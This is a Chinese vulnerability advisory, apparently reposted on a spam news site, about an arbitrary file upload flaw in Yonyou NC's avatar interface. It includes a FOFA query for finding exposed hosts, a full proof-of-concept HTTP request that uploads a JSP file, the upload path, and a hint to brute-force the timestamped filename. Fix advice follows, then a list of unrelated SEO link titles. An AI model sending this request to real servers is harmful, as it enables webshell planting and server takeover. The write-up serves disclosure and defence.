当前位置: 首页 > news >正文

做网站最少多少钱电脑培训班附近有吗

做网站最少多少钱,电脑培训班附近有吗,做动态效果的网站,用wordpress做的网站产品简介 用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。 漏洞介绍 用友 NC avatar接口处…

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

漏洞介绍

用友 NC avatar接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

资产测绘

FOFA:app=“用友-UFIDA-NC”

漏洞复现

POST /uapim/upload/avatar?usercode=1&fileType=jsp HTTP/1.1
Host: 172.21.1.139:8084
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
User-Agent: Mozilla/5.0 ------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="12.jsp"
Content-Type: application/octet-streamhello ^^
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--

在这里插入图片描述
文件上传路径
/uapim/static/pages/photo/1/1.{{timestamp}}.jsp
文件名为当前上传文件的时间戳
可以通过编写脚本爆破获取
在这里插入图片描述
在这里插入图片描述

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

http://www.dinnco.com/news/82416.html

相关文章:

  • 专业做制作网站上海网站建设开发公司
  • 阿里云搭建安装wordpress教程类聚seo
  • 深圳网站建设 公司元深圳互联网公司50强
  • 网站外包价格 北京网站制作公司中国网络推广网站排名
  • 温州网站推广站建设莆田seo推广公司
  • 100m光纤做网站南京百度推广开户
  • 基于web的在线电影网站设计论文外包网站
  • 平面设计师服务平台外链seo
  • 做校园文化的网站无忧seo
  • 邢台企业做网站推广100个电商平台
  • 如何做微信网站做广告seo外链软件
  • 手机移动端网站是什么百度公司
  • 网站的建设方法包括什么问题热点新闻
  • 网站建设的现状和趋势百度怎么打广告
  • 如何做内容收费的网站百度推广关键词规划师
  • 内网门户网站建设方案微信公众号推广2元一个
  • 招聘网站html模板seo站长网
  • 毕业设计做网站大小有什么要求如何做好网络推广销售
  • 给企业做网站如何定价nba篮网最新消息
  • 马蜂窝网站做的重点苏州seo排名优化课程
  • 无需登录网页小游戏网站高权重网站出售
  • wordpress调用添加登陆页面按钮廊坊自动seo
  • 做零食网站的首页模板免费b站推广网站短视频
  • 招聘网站收费标准对比图怎么做新的网络推广方式
  • 购买网站空间后怎么做seo搜索引擎实战详解
  • 一个ip 做2个网站吗东莞关键词排名优化
  • 深圳网站设计公司在哪里网站如何快速推广
  • 彩票网站搭建多钱全网自媒体平台
  • 北京旗网站制作百度软文推广怎样收费
  • 用java做的网站播不了视频app联盟推广平台